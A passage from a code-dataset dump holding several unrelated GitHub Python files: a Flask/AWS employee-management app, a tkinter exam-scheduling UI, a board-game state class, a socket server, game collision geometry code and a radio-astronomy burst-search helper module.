'POST'])\r\ndef payslipProcess():\r\n emp_id = request.form['employee_id']\r\n salary = request.form['salary']\r\n date = request.form['date']\r\n\r\n \r\n cursor = db_conn.cursor()\r\n insert_sql = \"INSERT INTO payroll (Employee_ID, Salary, Date) VALUES (%s, %s, %s)\"\r\n\r\n cursor.execute(insert_sql, (emp_id, salary, date))\r\n db_conn.commit()\r\n cursor.close()\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM payroll')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('payroll.html', rows=rows)\r\n\r\n#Attendance Checker\r\n@app.route(\"/markAtt\")\r\ndef markAtt():\r\n\r\n return render_template('markAtt.html')\r\n\r\n@app.route(\"/markAttProcess\", methods=['GET', 'POST'])\r\ndef markAttProcess():\r\n emp_id = request.form['employee_id']\r\n status = request.form['status']\r\n \r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n #update_sql = \"UPDATE attendance SET Status=%s, Time_Stamp=SYSDATE() WHERE Employee_ID=%s\"\r\n insert_sql = \"INSERT INTO attendance VALUES (%s,SYSDATE(), %s)\"\r\n\r\n cursor.execute(insert_sql, (emp_id, status))\r\n db_conn.commit()\r\n cursor.close()\r\n\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM attendance')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('attendance.html', rows=rows)\r\n\r\n#Leave Application\r\n@app.route(\"/leaveApp\")\r\ndef leaveApp():\r\n\r\n return render_template('leaveApp.html')\r\n\r\n@app.route(\"/leaveAppProcess\", methods=['GET', 'POST'])\r\ndef leaveAppProcess():\r\n emp_id = request.form['employee_id']\r\n date = request.form['leave_date']\r\n reason = request.form['reason']\r\n days = request.form['days']\r\n\r\n mc = request.files['mc_evidence']\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n insert_sql = \"INSERT INTO leave_application (Employee_ID, Submission_Date, Reason_of_Leave, Total_Day) VALUES (%s, %s, %s, %s)\"\r\n\r\n \r\n if mc.filename == \"\":\r\n return \"Please select a file\"\r\n\r\n try:\r\n \r\n cursor.execute(insert_sql, (emp_id, date, reason, days))\r\n db_conn.commit()\r\n # Uplaod image file in S3 #\r\n mc_file_name_in_s3 = \"emp-id-\" + str(emp_id) + \"_image_file\"\r\n s3 = boto3.resource('s3')\r\n\r\n try:\r\n print(\"Data inserted in MySQL RDS... 
uploading image to S3...\")\r\n s3.Bucket(custombucket).put_object(Key=mc_file_name_in_s3, Body=mc)\r\n bucket_location = boto3.client('s3').get_bucket_location(Bucket=custombucket)\r\n s3_location = (bucket_location['LocationConstraint'])\r\n\r\n if s3_location is None:\r\n s3_location = ''\r\n else:\r\n s3_location = '-' + s3_location\r\n\r\n object_url = \"https://s3{0}.amazonaws.com/{1}/{2}\".format(\r\n s3_location,\r\n custombucket,\r\n mc_file_name_in_s3)\r\n\r\n except Exception as e:\r\n return str(e)\r\n\r\n finally:\r\n cursor.close()\r\n\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM leave_application')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('leave.html', rows=rows)\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=80, debug=True)","repo_name":"elissammi/aws-empMgr","sub_path":"mlunaApp.py","file_name":"mlunaApp.py","file_ext":"py","file_size_in_byte":7739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15565202838","text":"import tkinter as tk\nfrom tkinter import ttk\nimport ui_subject as uisub\nimport ui_staff as uistaff\nimport ui_invigilator as uiinv\nimport ui_examhall as uiexamhall\nimport ui_exam as uiexam\nimport ui_class as uiclass\nimport ui_examinstance as uiexaminstance\nimport uiabstract\n\n\nclass HomeUI(uiabstract.ParentUI):\n def __init__(self, *args, **kwargs):\n uiabstract.ParentUI.__init__(self, *args, **kwargs)\n # child UI definitions\n self.update_UI = None\n\n\n self.mainLabel = ttk.Label(self.container, text=\"Please select a collection\")\n\n # button constants\n self.BTNSUBKEY = 0\n self.BTNSTAFFKEY = 1\n self.BTNINVIGILATORKEY = 2\n self.BTNEXAMHALLKEY = 3\n self.BTNEXAMKEY = 4\n self.BTNCLASSKEY = 5\n self.BTNEXAMINSTANCEKEY = 6\n\n # buttons\n self.btn_subject = ttk.Button(self.container, text=\"Subjects\", command=lambda: self.btn_handler(self.BTNSUBKEY))\n self.btn_staff = ttk.Button(self.container, text=\"Staffs\", command=lambda: self.btn_handler(self.BTNSTAFFKEY))\n self.btn_invigilator = ttk.Button(self.container, text=\"Invigilators\",\n command=lambda: self.btn_handler(self.BTNINVIGILATORKEY))\n self.btn_examhall = ttk.Button(self.container, text=\"Examhalls\",\n command=lambda: self.btn_handler(self.BTNEXAMHALLKEY))\n self.btn_exam = ttk.Button(self.container, text=\"Exams\", command=lambda: self.btn_handler(self.BTNEXAMKEY))\n self.btn_class = ttk.Button(self.container, text=\"Classes\", command=lambda: self.btn_handler(self.BTNCLASSKEY))\n self.btn_examinstance = ttk.Button(self.container, text=\"Exam instances\",\n command=lambda: self.btn_handler(self.BTNEXAMINSTANCEKEY))\n\n # layout\n self.mainLabel.grid(row=0, columnspan=3)\n self.btn_subject.grid(row=1)\n self.btn_staff.grid(row=1, column=1)\n self.btn_invigilator.grid(row=1, column=2)\n self.btn_examhall.grid(row=2)\n self.btn_exam.grid(row=2, column=1)\n self.btn_class.grid(row=2, column=2)\n self.btn_examinstance.grid(row=3)\n\n # padding configuration\n for child in self.container.winfo_children():\n child.grid_configure(padx=10, pady=20)\n\n # click event handlers\n\n def btn_handler(self, key):\n if key == self.BTNSUBKEY:\n self.update_UI = uisub.DisplayUpdateSubjectUI()\n elif key == self.BTNEXAMINSTANCEKEY:\n self.update_UI = uiexaminstance.DisplayUpdateExaminstanceUI()\n elif key == self.BTNCLASSKEY:\n self.update_UI = uiclass.DisplayUpdateClassUI()\n elif key == self.BTNEXAMKEY:\n self.update_UI = uiexam.DisplayUpdateExamUI()\n elif 
key == self.BTNEXAMHALLKEY:\n self.update_UI = uiexamhall.DisplayUpdateExamhallUI()\n elif key == self.BTNINVIGILATORKEY:\n self.update_UI = uiinv.DisplayUpdateInvigilatorUI()\n elif key == self.BTNSTAFFKEY:\n self.update_UI = uistaff.DisplayUpdateStaffUI()\n\n\n\n\n","repo_name":"peaceofmind123/invigilators","sub_path":"code/homeui.py","file_name":"homeui.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9219898963","text":"from copy import deepcopy\n\nxlim, ylim = 3, 2 # board dimensions\n\nclass GameState:\n \"\"\"\n Attributes\n ----------\n _board: list(list)\n Represent the board with a 2d array _board[x][y]\n where open spaces are 0 and closed spaces are 1\n \n _parity: bool\n Keep track of active player initiative (which\n player has control to move) where 0 indicates that\n player one has initiative and 1 indicates player 2\n \n _player_locations: list(tuple)\n Keep track of the current location of each player\n on the board where position is encoded by the\n board indices of their last move, e.g., [(0, 0), (1, 0)]\n means player 1 is at (0, 0) and player 2 is at (1, 0)\n \n \"\"\"\n\n def __init__(self):\n self._board = [[0] * ylim for _ in range(xlim)]\n self._board[-1][-1] = 1 # block lower-right corner\n self._parity = 0\n self._player_locations = [None, None]\n\n def forecast_move(self, move):\n \"\"\" Return a new board object with the specified move\n applied to the current game state.\n \n Parameters\n ----------\n move: tuple\n The target position for the active player's next move\n \"\"\"\n if move not in self.get_legal_moves():\n raise RuntimeError(\"Attempted forecast of illegal move\")\n newBoard = deepcopy(self)\n newBoard._board[move[0]][move[1]] = 1\n newBoard._player_locations[self._parity] = move\n newBoard._parity ^= 1\n return newBoard\n\n def get_legal_moves(self):\n \"\"\" Return a list of all legal moves available to the\n active player. Each player should get a list of all\n empty spaces on the board on their first move, and\n otherwise they should get a list of all open spaces\n in a straight line along any row, column or diagonal\n from their current position. (Players CANNOT move\n through obstacles or blocked squares.) 
Moves should\n        be a pair of integers in (column, row) order specifying\n        the zero-indexed coordinates on the board.\n        \"\"\"\n        loc = self._player_locations[self._parity]\n        if not loc:\n            return self._get_blank_spaces()\n        moves = []\n        rays = [(1, 0), (1, -1), (0, -1), (-1, -1),\n                (-1, 0), (-1, 1), (0, 1), (1, 1)]\n        for dx, dy in rays:\n            _x, _y = loc\n            while 0 <= _x + dx < xlim and 0 <= _y + dy < ylim:\n                _x, _y = _x + dx, _y + dy\n                if self._board[_x][_y]:\n                    break\n                moves.append((_x, _y))\n        return moves\n\n    def _get_blank_spaces(self):\n        \"\"\" Return a list of blank spaces on the board.\"\"\"\n        return [(x, y) for y in range(ylim) for x in range(xlim)\n                if self._board[x][y] == 0]\n","repo_name":"bhupendpatil/Practice","sub_path":"Artificial Intelligence/Search and Optimization/Introduction to Game Playing/gamestate.py","file_name":"gamestate.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"9868137856","text":"# Count how much memory was allocated for the variables in the programs developed earlier, within the first three lessons.\n# Analyze the result and identify the programs that use memory most efficiently.\n\n# Task: three different numbers are entered. Find the one that is the middle value (greater than one of the others, but less than the other).\n\nimport sys\n\n\ndef show_size(x, level=0):\n    print('\\t' * level, f'type = {x.__class__}, size = {sys.getsizeof(x)}, object = {x}')\n\n\np = 'Enter three numbers:'\nprint(p)\nshow_size(p)\n# type = <class 'str'>, size = 74, object = Enter three numbers:\n\na = int(input(\"a = \"))\nshow_size(a)\n# type = <class 'int'>, size = 14, object = 5\n\nb = int(input(\"b = \"))\nshow_size(b)\n# type = <class 'int'>, size = 14, object = 6\n\nc = int(input(\"c = \"))\nshow_size(c)\n# type = <class 'int'>, size = 14, object = 7\n\nm = 'Middle:'\nshow_size(m)\n# type = <class 'str'>, size = 54, object = Middle:\n\nif (b < a < c) or (c < a < b):\n    print(m, a)\nelif (a < b < c) or (c < b < a):\n    print(m, b)\nelse:\n    print(m, c)\n\nshow_size((sys.getsizeof(p) + sys.getsizeof(a) + sys.getsizeof(b)+ sys.getsizeof(c) + sys.getsizeof(m)))\n# type = <class 'int'>, size = 14, object = 170\n","repo_name":"NikolaySibekin/algorithms_lesson6","sub_path":"task_1_1.py","file_name":"task_1_1.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70366415930","text":"from threading import Thread\nfrom socket import *\n\nlist_escolas=[\"Imperatriz Leopoldinense\",\"Estação Primeira de Mangueira\",\"Acadêmicos do Salgueiro\",\"São Clemente\",\"Unidos do Viradouro\",\"Beija-Flor de Nilópolis\",\n\"Paraíso do Tuiuti\",\"Portela\",\"Mocidade Independente de Padre Miguel\",\"Unidos da Tijuca\",\"Acadêmicos do Grande Rio\",\"Unidos de Vila Isabel\"]\n\n\n    \n\ndef atende (conn, cliente):\n    while True:\n        data = conn.recv (8192)\n        print(data)\n        if not data or len(data) == 0:\n            break\n\n        print (str(cliente)+\" received message \"+data.decode(\"utf-8\") )\n        \n        \n        \n        # conn.send (str.encode (\"I know you sent me \"+data.decode(\"utf-8\") , \"UTF-8\"))\n\n    print (\"End of connection with \"+str(cliente))\n\n    conn.close()\n    \n\ns = socket ()\n\nhost = \"0.0.0.0\"\nporta = 8192\ns.bind ((host, porta))\ns.listen (10)\nnthr = 0\n\nwhile True:\n    print(\"Waiting for a client connection\")\n    (conn, cliente) = s.accept 
()\n","repo_name":"jiaxingc/client_server","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41621226101","text":"import pytiled_parser\n\nimport serialize\nfrom gametree import Component, Vector2f, Vector2\nimport environ\nimport utils\nimport numpy as np\nimport math\nfrom typing import Optional\nimport sys\n\nfrom shapely import speedups # type: ignore\nfrom shapely.geometry import Polygon, Point # type: ignore\nfrom shapely.ops import nearest_points\n\n_PRECISION = 2\nCOLLIDER_DRAW_COLOR = (76, 40, 130, 127)\n\nspeedups.enable()\n\n\nclass Collider(Component):\n colliders = serialize.Unserialized()\n _transformed_colliders = serialize.Unserialized()\n _transformed_collider_polygons = serialize.Unserialized()\n _transformed_updated = serialize.Unserialized()\n\n def __init__(self):\n super().__init__()\n self.colliders: Optional[list] = None\n\n self._transformed_colliders: Optional[list] = None\n self._transformed_collider_polygons: Optional[list[Polygon]] = None\n self._transformed_updated: int = -1\n self.solid: bool = True\n\n def init_unserialized(self, deserializer):\n super().init_unserialized(deserializer)\n self._init_unserialized_called = True\n self._transformed_colliders = None\n self._transformed_collider_polygons = None\n self._transformed_updated = -1\n\n def duplicate(self, new_entity):\n new_component = self.__class__()\n new_component.colliders = self.colliders\n new_component.solid = self.solid\n return new_component\n\n def test_intersection(self, other) -> bool:\n if self.colliders is None:\n return False\n try:\n for left_c, left_p in zip(self.transformed_colliders, self.transformed_collider_polygons):\n for right in other.get_pcolliders(left_c):\n if are_polygons_intersecting(left_p, right):\n return True\n except TypeError as e:\n sys.stderr.write(str(e) + \"\\n\")\n return False\n\n def _update_transformed_colliders(self):\n if self._transformed_updated < self.entity.transform_modified:\n self._transformed_colliders = None\n self._transformed_collider_polygons = None\n\n if self._transformed_colliders is None:\n self._transformed_colliders = [self.entity.transform.transform_points(c) for c in self.colliders]\n self._transformed_collider_polygons = [\n Polygon(c) for c in self._transformed_colliders]\n self._transformed_updated = environ.game.get_modification_stamp()\n\n @property\n def transformed_colliders(self) -> Optional[list]:\n self._update_transformed_colliders()\n return self._transformed_colliders\n\n @property\n def transformed_collider_polygons(self) -> Optional[list]:\n self._update_transformed_colliders()\n return self._transformed_collider_polygons\n\n def minimum_translation_vector(self, other) -> Optional[Vector2]:\n ret = Vector2f()\n for left in self.colliders:\n left_t = self.entity.transform.transform_points(left)\n for right in other.get_colliders(left_t):\n right_t = other.entity.transform.transform_points(right)\n mtv = minimum_translation_vector(\n left_t,\n right_t)\n if mtv is not None:\n ret += mtv\n if ret[0] == 0.0 and ret[1] == 0.0:\n return None\n return ret\n\n def get_colliders(self, other_collider) -> list:\n if self.colliders is None:\n raise RuntimeError(f\"Colliders are not set!\")\n return self.colliders\n\n def get_pcolliders(self, other_collider) -> list:\n return self.transformed_collider_polygons\n\n @environ.client_only\n def draw_colliders(self):\n for collider in 
self.colliders:\n points = self.entity.transform.transform_points_to_pyarcade_space(collider)\n points = [(point.x, point.y) for point in points]\n environ.arcade.draw_polygon_filled(points, COLLIDER_DRAW_COLOR)\n\n\nclass ManualCollider(Collider):\n def __init__(self, collision_data: list, solid: bool = True):\n super().__init__()\n self._colliders: list = collision_data\n self.colliders: list = collision_data\n self.solid: bool = solid\n\n def init_unserialized(self, deserializer):\n super().init_unserialized(deserializer)\n self.colliders = self._colliders\n\n def duplicate(self, new_entity):\n new_component = self.__class__(self.colliders, self.solid)\n return new_component\n\n\nclass SingleCollider(Collider):\n def __init__(self, tmx_data=None, tileset_name: str =None, relative_gid: int =None, solid: bool =None):\n \"\"\"Must provide either tmx_data or (tileset_name and relative_gid and solid).\"\"\"\n super().__init__()\n if tmx_data is not None:\n self.tileset_name, self.relative_gid = environ.game.gid_to_tile_reference(tmx_data.gid)\n self.solid: bool = tmx_data.properties.get('solid', True)\n if tileset_name is not None:\n self.tileset_name = tileset_name\n if relative_gid is not None:\n self.relative_gid = relative_gid\n if solid is not None:\n self.solid = solid\n\n self.colliders: list = make_colliders_from_tile(environ.game.get_tile_by_tile_reference(self.tileset_name, self.relative_gid))\n\n def init_unserialized(self, deserializer):\n self.colliders = make_colliders_from_tile(deserializer.context.get_tile_by_tile_reference(self.tileset_name, self.relative_gid))\n super().init_unserialized(deserializer)\n\n def duplicate(self, new_entity):\n new_component = self.__class__(tileset_name=self.tileset_name, relative_gid=self.relative_gid, solid=self.solid)\n return new_component\n\n\nclass MultiCollider(Collider):\n collider_map = serialize.Unserialized()\n\n def __init__(self):\n super().__init__()\n self.collider_map: Optional[dict] = None\n\n def duplicate(self, new_entity):\n # Collider_map is set up when the component is attached to its entity\n new_component = self.__class__()\n return new_component\n\n def on_framesets_changed(self, framesets: dict, game):\n self.collider_map = {}\n for name, frameset in framesets.items():\n t: pytiled_parser.Tile = game.find_frameset(\n frameset.frameset)\n\n if t is None:\n raise RuntimeError(f\"Frameset {frameset.frameset} does not exist in Tiled map.\")\n\n flipped_horizontally = utils.is_flipped_horizontally(self.entity.gid)\n flipped_vertically = utils.is_flipped_vertically(self.entity.gid)\n t.flipped_horizontally = flipped_horizontally != frameset.flipped_horizontally\n t.flipped_vertically = flipped_vertically != frameset.flipped_vertically\n\n addcol = make_colliders_from_tile(t)\n self.collider_map[name] = addcol\n\n t.flipped_horizontally = False\n t.flipped_vertically = False\n\n def on_frameset_changed(self, new_frameset: dict):\n self.colliders = self.collider_map.get(new_frameset, \"\")\n\n # Force a recalculation next time collision might occur\n self._transformed_colliders = None\n self._transformed_collider_polygons = None\n\n def init_unserialized(self, deserializer):\n self.colliders = None\n super().init_unserialized(deserializer)\n\n\ndef make_colliders_from_tile(tile) -> list[Optional[list[Vector2]]]:\n ret: list[Optional[list[Vector2]]] = []\n if tile.objects is None:\n return ret\n for hitbox in tile.objects.tiled_objects:\n ret.append(make_collider_from_hitbox(hitbox))\n return ret\n\n\ndef 
make_collider_from_hitbox(hitbox) -> Optional[list[Vector2]]:\n    points = []\n    if isinstance(hitbox, pytiled_parser.tiled_object.Rectangle):\n        if hitbox.size is None:\n            sys.stderr.write(\n                \"Warning: Rectangle hitbox created without a \"\n                \"height or width. Ignoring.\\n\"\n            )\n            return None\n\n        points.append(Vector2f(hitbox.coordinates.x, hitbox.coordinates.y))\n        points.append(Vector2f(hitbox.coordinates.x + hitbox.size.width, hitbox.coordinates.y))\n        points.append(Vector2f(hitbox.coordinates.x + hitbox.size.width, hitbox.coordinates.y + hitbox.size.height))\n        points.append(Vector2f(hitbox.coordinates.x, hitbox.coordinates.y + hitbox.size.height))\n\n    elif isinstance(\n        hitbox, pytiled_parser.tiled_object.Polygon\n    ) or isinstance(hitbox, pytiled_parser.tiled_object.Polyline):\n        for coord in hitbox.points:\n            points.append(Vector2f(coord.x + hitbox.coordinates.x, coord.y + hitbox.coordinates.y))\n\n        if points[0][0] == points[-1][0] and points[0][1] == points[-1][1]:\n            points.pop()\n\n        clockwise_counter = 0.0\n        for i in range(0, len(points)):\n            clockwise_counter += (points[i].x - points[i-1].x) * (points[i].y + points[i-1].y)\n        if clockwise_counter > 0:\n            points.reverse()\n\n    elif isinstance(hitbox, pytiled_parser.tiled_object.Ellipse):\n        if not hitbox.size:\n            sys.stderr.write(\n                f\"Warning: Ellipse hitbox created without a height \"\n                f\" or width. Ignoring.\\n\"\n            )\n            return None\n\n        hw = hitbox.size.width / 2\n        hh = hitbox.size.height / 2\n        cx = hitbox.coordinates.x\n        cy = hitbox.coordinates.y\n\n        total_steps = 8\n        angles = [\n            step / total_steps * 2 * math.pi for step in range(total_steps)\n        ]\n        for angle in angles:\n            x = hw * math.cos(angle) + cx\n            y = -(hh * math.sin(angle) + cy)\n            points.append(Vector2f(x, y))\n    elif isinstance(hitbox, pytiled_parser.tiled_object.Point):\n        return None\n    else:\n        sys.stderr.write(f\"Warning: Hitbox type {type(hitbox)} not supported.\\n\")\n        return None\n\n    return points\n\n\ndef make_shapely_polygons(poly_a, poly_b) -> tuple:\n    return Polygon(poly_a), Polygon(poly_b)\n\n\ndef are_polygons_intersecting(poly_a, poly_b) -> bool:\n    r2 = False\n    r1 = poly_a.intersects(poly_b)\n    if r1:\n        r2 = poly_a.touches(poly_b)\n    return r1 and not r2\n\n\ndef minimum_translation_vector(poly_a, poly_b) -> Optional[Vector2]:\n    \"\"\"\n    If the polygons do not intersect, return None.\n    If the polygons do intersect, return the minimum translation\n    vector for poly_a. 
(That is, the translation vector to apply to\n poly_a such that it no longer intersects with poly_b.\n \"\"\"\n\n diff = minkowski_difference(poly_a, poly_b)\n minkowski_intersecting = is_point_in_polygon(0, 0, diff)\n\n if minkowski_intersecting:\n sdiff = Polygon(diff)\n npts = nearest_points(sdiff.exterior, Point(0, 0))\n return Vector2f(-npts[0].x, -npts[0].y)\n return None\n\n\ndef is_point_in_polygon(x: float, y: float, polygon_point_list: list) -> bool:\n\n shapely_point = Point(x, y)\n shapely_polygon = Polygon(polygon_point_list)\n\n return shapely_polygon.contains(shapely_point)\n\n\ndef _rotate_polygon_points(polygon) -> list:\n pos = 0\n for i in range(1, len(polygon)):\n if polygon[i].y < polygon[pos].y or polygon[i].y == polygon[pos].y and polygon[i].x < polygon[pos].x:\n pos = i\n\n # Rotate points:\n if pos != 0:\n return polygon[pos:] + polygon[:pos]\n return polygon[:]\n\n\ndef minkowski_sum(P: list, Q: list) -> list:\n # the first vertex must be the lowest\n P = _rotate_polygon_points(P)\n Q = _rotate_polygon_points(Q)\n\n # Ensure cyclic indexing\n P.append(P[0])\n P.append(P[1])\n Q.append(Q[0])\n Q.append(Q[1])\n\n # Run minkowski\n result = []\n i = 0\n j = 0\n while i < len(P) - 2 or j < len(Q) - 2:\n result.append(P[i] + Q[j])\n cross = np.cross(P[i + 1] - P[i], Q[j + 1] - Q[j])\n if cross >= 0: i += 1\n if cross <= 0: j += 1\n\n return result\n\n\ndef minkowski_difference(P: list, Q: list) -> list:\n return minkowski_sum(P, [q * -1 for q in Q])\n","repo_name":"google/google-ctf","sub_path":"2022/hackceler8/game/collision.py","file_name":"collision.py","file_ext":"py","file_size_in_byte":12060,"program_lang":"python","lang":"en","doc_type":"code","stars":4153,"dataset":"github-code","pt":"77"} +{"seq_id":"71018797050","text":"#! 
/usr/bin/env python\r\nimport os\r\nimport sys\r\nimport time\r\nimport readfil\r\nimport astropy.io.fits as pyfits\r\nimport numpy as np\r\nimport torch\r\n\r\ndef printcuda(cuda):\r\n print(\"GPU Memory Using: \",\r\n torch.cuda.memory_allocated(cuda)//(1024*1024), torch.cuda.max_memory_allocated(cuda)//(1024*1024), \r\n torch.cuda.memory_cached(cuda)//(1024*1024), torch.cuda.max_memory_cached(cuda)//(1024*1024))\r\n\r\ndef readplotini(inifile):\r\n FILENAME = []\r\n FITSFILE = []\r\n PlotReady = 0\r\n PLOTFILE = []\r\n with open(inifile,'r') as fd:\r\n all_lines = fd.readlines()\r\n for i in range(len(all_lines)):\r\n #### Skip Empty Line ####\r\n if len(all_lines[i].split()) == 0:\r\n continue\r\n #### Skip # Line ####\r\n elif \"#\" in all_lines[i].split()[0]:\r\n continue\r\n elif 'PlotReady' in all_lines[i]:\r\n PlotReady = int(all_lines[i].split()[2]) \r\n elif 'SearchPath' in all_lines[i]:\r\n SearchPath = all_lines[i].split()[2]\r\n elif 'PLOTFILE' in all_lines[i]:\r\n PLOTFILE = all_lines[i].split()[2]\r\n for root, _, files in os.walk(SearchPath):\r\n for fil in files:\r\n if fil.endswith(\".fil\"):\r\n FILENAME.append(os.path.join(root, fil))\r\n elif fil.endswith(\".fits\"):\r\n FILENAME.append(os.path.join(root, fil))\r\n return PlotReady, FILENAME, PLOTFILE\r\n\r\ndef readini(inifile):\r\n PlotTime = []\r\n Plotrange = 0\r\n PlotDM = 0.0\r\n WINDOWSIZE = 250\r\n RFITHR = 4.0\r\n IGNORE = []\r\n CHOFF_LOW = 0\r\n CHOFF_HIGH = 0\r\n THRESH = 1.0\r\n NSMAX = 1\r\n LODM = 0.0\r\n HIDM = 1.0\r\n DDM = 0.1\r\n PlotPersent = 1.0\r\n useGPU = True #False #\r\n BlockSize = 1000\r\n with open(inifile,'r') as fd:\r\n all_lines = fd.readlines()\r\n for i in range(len(all_lines)):\r\n #### Skip Empty Line ####\r\n if len(all_lines[i].split()) == 0:\r\n continue\r\n #### Skip # Line ####\r\n elif \"#\" in all_lines[i].split()[0]:\r\n continue\r\n elif 'THRESH' in all_lines[i]:\r\n THRESH = float(all_lines[i].split()[2])\r\n elif 'NSMAX' in all_lines[i]:\r\n NSMAX = int(all_lines[i].split()[2])\r\n elif 'LODM' in all_lines[i]:\r\n LODM = float(all_lines[i].split()[2])\r\n elif 'HIDM' in all_lines[i]:\r\n HIDM = float(all_lines[i].split()[2])\r\n elif 'DDM' in all_lines[i]:\r\n DDM = float(all_lines[i].split()[2])\r\n elif 'RFITHR' in all_lines[i]:\r\n RFITHR = float(all_lines[i].split()[2])\r\n elif 'IGNORE' in all_lines[i]:\r\n # IGNORE = int(all_lines[i].split()[2])\r\n for s in range(len(all_lines[i].split()) - 2):\r\n IGNORE.append(all_lines[i].split()[2+s]) \r\n elif 'WINDOWSIZE' in all_lines[i]:\r\n WINDOWSIZE = int(all_lines[i].split()[2])\r\n elif 'CHOFF_LOW' in all_lines[i]:\r\n CHOFF_LOW = int(all_lines[i].split()[2])\r\n elif 'CHOFF_HIGH' in all_lines[i]:\r\n CHOFF_HIGH = int(all_lines[i].split()[2])\r\n elif 'AVERAGE' in all_lines[i]:\r\n AVERAGE = int(all_lines[i].split()[2])\r\n elif 'FREQAVG' in all_lines[i]:\r\n FREQAVG = int(all_lines[i].split()[2])\r\n elif 'PlotTime' in all_lines[i]:\r\n for s in range(len(all_lines[i].split()) - 2):\r\n PlotTime.append(all_lines[i].split()[2+s]) \r\n elif 'Plotrange' in all_lines[i]:\r\n Plotrange = float(all_lines[i].split()[2]) \r\n elif 'PlotDM' in all_lines[i]:\r\n PlotDM = float(all_lines[i].split()[2]) \r\n elif 'PlotPersent' in all_lines[i]:\r\n PlotPersent = float(all_lines[i].split()[2]) \r\n if PlotPersent <= 0:\r\n print(\"PlotPersent can't <= 0\")\r\n exit()\r\n elif PlotPersent > 1:\r\n print(\"PlotPersent can't > 1\")\r\n exit()\r\n elif 'PlotBoxcar' in all_lines[i]:\r\n PlotBoxcar = float(all_lines[i].split()[2]) \r\n 
elif 'BlockSize' in all_lines[i]:\r\n BlockSize = int(all_lines[i].split()[2])\r\n elif 'useGPU' in all_lines[i]:\r\n if int(all_lines[i].split()[2]) == 0:\r\n print(\"Using CPU\")\r\n useGPU = False\r\n else:\r\n print(\"Using GPU\")\r\n useGPU = True\r\n sys.stdout.flush()\r\n \r\n if (FREQAVG == 0 or AVERAGE == 0) :\r\n print(\"AVERAGE or FREQAVG can't be Zero !!!\")\r\n exit()\r\n return (THRESH, NSMAX, LODM, HIDM, DDM, RFITHR, IGNORE, WINDOWSIZE, CHOFF_LOW, \r\n CHOFF_HIGH, PlotPersent, PlotBoxcar, PlotTime, Plotrange, PlotDM, AVERAGE, \r\n FREQAVG, useGPU, BlockSize,)\r\n\r\ndef convolve(dn, boxcar):\r\n conv = dn.copy()\r\n for i in range(1, boxcar):\r\n # conv[i:] += dn[:-i]\r\n # conv[:i] += dn[-i:]\r\n conv += np.roll(dn, i, axis = 0)\r\n return conv\r\n\r\ndef convolve_gpu(dn, boxcar):\r\n conv = dn.detach().clone()\r\n for i in range(1, boxcar):\r\n # conv[i:] += dn[:-i]\r\n # conv[:i] += dn[-i:]\r\n conv += torch.roll(dn, i, dims = 0)\r\n return conv\r\n\r\ndef mad(din, nbl, wsize):\r\n # tmp_des = np.sort(din.copy().mean(axis= 1).reshape(nbl, wsize), axis=1)\r\n # med = tmp_des[:, wsize//2].reshape(nbl, 1)\r\n # rms = np.sort(np.abs(tmp_des - med))[:, wsize//2] #\r\n # din = din.mean(axis= 1).reshape(nbl, wsize)\r\n med = np.median(din, axis=1).reshape(nbl, 1)\r\n rms = np.median(np.abs(din-med), axis=1)\r\n return med, 1.4826*rms\r\n\r\ndef mad_gpu(din, nbl, wsize):\r\n # tmp_des, _ = torch.sort(din.mean(dim= 1).view(nbl, wsize), dim=1)\r\n # med = tmp_des[:, wsize//2].view(nbl, 1)\r\n # tmp_des, _ = torch.sort(torch.abs(tmp_des - med))\r\n # rms = tmp_des[:, wsize//2] #\r\n # din = din.mean(dim= 1).view(nbl, wsize)\r\n med, _ = torch.median(din, 1)\r\n med = med.view(nbl, 1)\r\n rms, _ = torch.median(torch.abs(din-med), 1)\r\n return med, 1.4826*rms\r\n\r\ndef cleanning(din, tthresh, totalch, choff_low, choff_high, nbl, wsize, sample, ignore, plotbc):\r\n #### Remove offset channel ####\r\n nch = totalch-choff_low-choff_high\r\n data_conv = din.copy()[:, choff_high: totalch-choff_low]\r\n #### Convolve ####\r\n data_rfi = convolve(data_conv, int(plotbc))\r\n #### Ignore channels ####\r\n channel_med = np.median(data_rfi, axis=1)\r\n for i in range(len(ignore)):\r\n for s in range(5):\r\n data_rfi.transpose()[int(ignore[i])-2+s] = (\r\n np.random.normal(channel_med.mean(), np.std(channel_med), data_rfi.shape[0]))\r\n #(med_rfi.reshape(1, -1)).repeat(5, axis=0)\r\n #### Remove RFI in time ####\r\n # med_rfi = np.median(data_rfi.copy(), axis=1)\r\n med_tim = np.median(data_rfi.copy(), axis=0)\r\n # med, rms = mad(data_rfi, nbl, wsize)\r\n # sigma = ((data_rfi.copy().mean(axis = 1).reshape(nbl, wsize) - med\r\n # )/rms.reshape(nbl, 1)).reshape(-1)\r\n # # data_rfi[np.where(sigma > tthresh)] = np.random.chisquare(wsize, \r\n # # nch)/wsize*np.sqrt((med**2).mean())\r\n # data_rfi[np.where(sigma > tthresh)] = data_rfi.copy().mean(axis=0)\r\n data_time = data_rfi.copy().mean(axis= 1).reshape(nbl, wsize)\r\n med_time, rms_time = mad(data_time, nbl, wsize)\r\n sigma_time = ((data_time - med_time)/rms_time.reshape(nbl, 1)).reshape(-1)\r\n data_rfi[np.where(sigma_time > tthresh)] = 